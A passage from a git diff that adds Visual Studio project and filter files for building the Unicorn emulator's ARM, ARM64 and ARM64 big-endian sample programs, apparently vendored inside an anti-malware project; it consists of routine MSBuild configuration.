Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + 
<IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + 
<AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + 
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj.filters new file mode 100644 index 0000000..76c03db --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj 
b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj new file mode 100644 index 0000000..d61b4ae --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{04DC0E3A-F247-45C2-AE27-8DE7493AA43B}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_arm64</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" 
Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + 
<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + 
</ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm64.c" /> + </ItemGroup> + <Import 
Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj.filters new file mode 100644 index 0000000..1be43ac --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm64.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj new file mode 100644 index 0000000..b55c3f4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + 
<ProjectGuid>{1A42A5E3-82A7-4EE4-B7D2-8265B147F124}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_arm64eb</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" 
Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup 
Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + 
<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + 
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm64eb.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj.filters 